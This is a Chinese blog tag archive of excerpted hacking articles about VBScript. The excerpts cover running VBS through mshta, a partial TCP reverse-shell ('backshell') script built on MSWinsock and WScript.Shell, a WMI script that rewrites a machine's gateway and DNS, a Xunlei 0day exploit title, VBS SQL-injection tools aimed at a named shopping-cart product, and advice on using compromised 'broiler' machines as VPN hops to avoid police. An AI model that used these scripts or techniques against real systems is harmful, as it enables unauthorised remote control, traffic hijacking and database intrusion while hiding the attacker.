标签 ‘VBS’ 下的日志

非常规运行vbs

作者:lcx

  这期专栏依旧是vbs,估计大家会有点烦,那我们来点有意思的吧。vbs有一个对像是“SAPI.SpVoice”,可以用它来讲英语的,这个组件在 xp、2003上默认都可以用的,调用后可以听到电脑上一个国外老男人在说话。好比这样一句代码:●CreateObject ("SAPI.SpVoice").Speak "I LOVE YOU"●,保存成vbs后缀后双击就会听到英语的我爱你了。但随之而来我们讲到另一个问题,不保存成vbs或vbe后缀如何运行vbs代码。

一、用mshta来运行vbs
hta这种类型的文件运行后也是系统权限,其调用宿主就是mshta.exe。我们在cmd下运行这样一行代码:●mshta vbscript:createobject("sapi.spvoice").speak("I 阅读全文 »

Tags:

TCP版backshell的VBS脚本

'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by 009, [email protected]
'date:071221

Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234

Sub WSEvent_Connect()
wscript.echo "Connected!"
end sub
阅读全文 »

Tags: ,

Change Gateway\DNS for vbs

来源:vbs空间

Const T_GATEWAY = "1.1.1.1" '网关
Const T_NEWDNS1 = "2.2.2.2" 'DNS1
Const T_NEWDNS2 = "3.3.3.3" 'DNS2
strWinMgmt="winmgmts:{impersonationLevel=impersonate}"
Set NICS = GetObject( strWinMgmt ).InstancesOf("Win32_NetworkAdapterConfiguration")
For Each NIC In NICS
If NIC.IPEnabled Then
NIC.SetDNSServerSearchOrder Array(T_NEWDNS1,T_NEWDNS2)
NIC.SetGateways Array(T_GATEWAY)
阅读全文 »

Tags: ,

base64 解密vbs版

作者:lcx
来源:vbs小铺

阅读全文 »

Tags: ,

[vbs也写EXP]xunlei_0day_exp

来源:vbs空间

阅读全文 »

Tags: , ,

谈VBS在Hacking中的作用之二

来源:vbs空间

NetPatch
此文已经发于黑客手册第十一期
上一期写了一个VBS的注入脚本,这次给大家带来两个脚本,希望小菜们能喜欢。
一.挑选速度快的肉鸡做VPN。
当自己从小菜鸟转型为老菜鸟时,就懂得考虑在玩Hacking的同时也要尽量保证不暴露
自己。万事,安全第一嘛!不然都不知道哪天玩着玩着就被警察叔叔带去喝茶了^_^ 。
因此,作为老菜鸟的我们,要学会在Hacking时,多用VPN+终端等跳板措施来保护自己,尽量不让自己直接暴露所处地。
但是,由于跳板的增加,导致了数据传输的缓慢。因此我们完全有必要找网速快的机器来做VPN跳板。但如果让自己做这些重复性的操作(从众多的肉鸡中挑选网速好的),那就太愧对老菜鸟这个称呼了。对于学过编程的朋友来说,那简直易如反掌。但对小菜来说,可能还有点难度。因此,今天我就先简单的介绍下,如何用VBS帮我们挑选速度快的肉鸡。
阅读全文 »

Tags: ,

谈VBS在Hacking中的作用———SQL Inject中的应用

来源:vbs空间

本文,已发于《黑客手册》07年10月刊
平常我们遇到有注入漏洞一类的网站大部分人都是用NBSI Or 阿D一类的注射工具。但有的站点的注射点很难构造,或者说注射语句比较特殊。如果用手工去注射的话,费时又费力!但自己写针对性的工具的话,对一些刚入门不久或不会编程的朋友来说,实在是一件很痛苦的事情。因此今天NP给大家带来的文章就是讲如何用简单的VBS脚本来打造我们所要的注射工具。
在您继续看这篇文章之前,我先大胆的假设此时的您已经学会了VBS脚本的基础知识以及基本的SQL Inject知识。
首先,我们先来看一段有漏洞的代码。(此代码摘自“网趣网上购物系统时尚版 v3.2”的Getpwd2.asp的片段)
BTW:此漏洞乃好友Trace首先发现并提供测试的!在此表示感谢!
阅读全文 »

Tags: , , ,

利用VBS辅助入侵

作者:lcx
来源:vbs小铺

不知大家看了上期我的的文章里的几则vbs代码,有何感想。也许有的高手会不顾一屑,也许有的菜菜会会心一笑,无论如何,这期我还是厚着脸皮继续来贴 VBS代码赚稿费来了。利用VBS来写一个像模像样的工具是困难了点(其实是我水平不够),但是用它来辅助入侵,方便手工则有的时候是恰当好处了,还是来写三个例子吧。

一、更改注入代码框的长度
有的注入点是在文本框里的,像搜索之类的注入。当然,抓包提取出注入点的url然后放在工具里也是可以的。如果喜欢手工的话,可以直接在文本框里写入注入语句提交。但这时候就会有一些问题了,有的文本框限制了你提交内容的长度。很多人这时候的做法是将该注入页面保存下来,去掉html里的长度限制,然后本地提交。这样一来,不仅麻烦,而且有时还会带来re 阅读全文 »

Tags: